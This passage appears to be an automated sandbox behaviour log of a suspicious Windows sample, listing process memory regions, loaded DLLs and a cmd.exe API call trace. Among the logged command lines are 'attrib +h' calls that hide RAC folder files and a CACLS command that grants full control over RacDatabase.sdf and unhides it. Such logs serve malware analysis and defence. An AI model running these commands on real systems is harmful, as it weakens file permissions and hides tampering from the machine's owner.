region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9444 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 9445 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9446 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9447 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9448 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9449 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 9450 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 9451 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9452 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9453 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9454 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = 
"lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9455 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9456 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9457 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9458 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9459 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9460 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9461 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9462 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9463 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename 
= "" Region: id = 9464 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9465 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 122 os_tid = 0xf68 Process: id = "70" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xf6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xf3c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9530 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9531 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9532 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9533 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 9534 start_va = 0x510000 end_va = 0x516fff entry_point = 0x510000 region_type = mapped_file name = 
"attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9535 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9536 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9537 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9538 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 9539 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9540 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9541 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9542 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9543 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 9544 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 9545 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = 
"\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9546 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9547 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9548 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9549 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9550 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9551 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9552 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9553 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9554 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = 
mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9555 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9556 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9557 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 9558 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9559 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 123 os_tid = 0xf70 Process: id = "71" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "68" os_parent_pid = "0xf3c" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\RAC\\PUBLIS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9560 start_va = 0x10000 end_va = 0x2ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9561 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9562 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9563 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 9564 start_va = 0x620000 end_va = 0x626fff entry_point = 0x620000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 9565 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9566 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9567 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9568 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 9569 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9570 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9571 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" 
Region: id = 9572 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9573 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 9574 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 9575 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 9576 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9577 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9578 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 9579 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9580 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9581 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = 
"msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9582 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9583 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9584 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9585 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9586 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9587 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9588 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9589 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 124 os_tid = 0xf78 Process: id = "72" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0xf90" os_integrity_level = "0x3000" os_privileges = "0x60800000" 
monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9871 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9872 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9873 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9874 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 9875 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 9876 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9877 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" 
(normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9878 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9879 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9880 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9881 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9882 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9883 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9884 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 9885 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 9886 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 9887 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9888 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 9889 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9890 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9891 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9892 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 9893 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9894 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 9895 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 9896 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9897 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9898 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9899 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9900 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9901 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 9902 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 9903 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 9904 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 9905 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 128 os_tid = 0xf94 [0126.534] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd04 | out: lpSystemTimeAsFileTime=0x22fd04*(dwLowDateTime=0x855a66e0, dwHighDateTime=0x1d440a9)) [0126.534] GetCurrentProcessId () returned 0xf90 [0126.534] GetCurrentThreadId () returned 0xf94 [0126.534] GetTickCount () returned 0x28b2e [0126.534] QueryPerformanceCounter (in: lpPerformanceCount=0x22fcfc | out: lpPerformanceCount=0x22fcfc*=18332357047) returned 1 [0126.535] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0126.535] __set_app_type (_Type=0x1) [0126.535] __p__fmode () returned 0x76b331f4 [0126.535] __p__commode () returned 0x76b331fc [0126.535] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) 
returned 0x0 [0126.535] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0126.536] GetCurrentThreadId () returned 0xf94 [0126.536] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf94) returned 0x38 [0126.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0126.536] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0126.536] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.536] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.536] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fc94 | out: phkResult=0x22fc94*=0x0) returned 0x2 [0126.536] VirtualQuery (in: lpAddress=0x22fccb, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0126.536] VirtualQuery (in: lpAddress=0x230000, 
lpBuffer=0x22fc64, dwLength=0x1c | out: lpBuffer=0x22fc64*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0126.536] GetConsoleOutputCP () returned 0x1b5 [0126.536] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.537] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0126.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0126.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.537] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.537] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.537] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.537] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.537] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.538] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.538] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0126.538] GetEnvironmentStringsW () returned 0x360240* [0126.538] FreeEnvironmentStringsW (penv=0x360240) returned 1 [0126.538] GetEnvironmentStringsW () returned 0x360240* [0126.538] 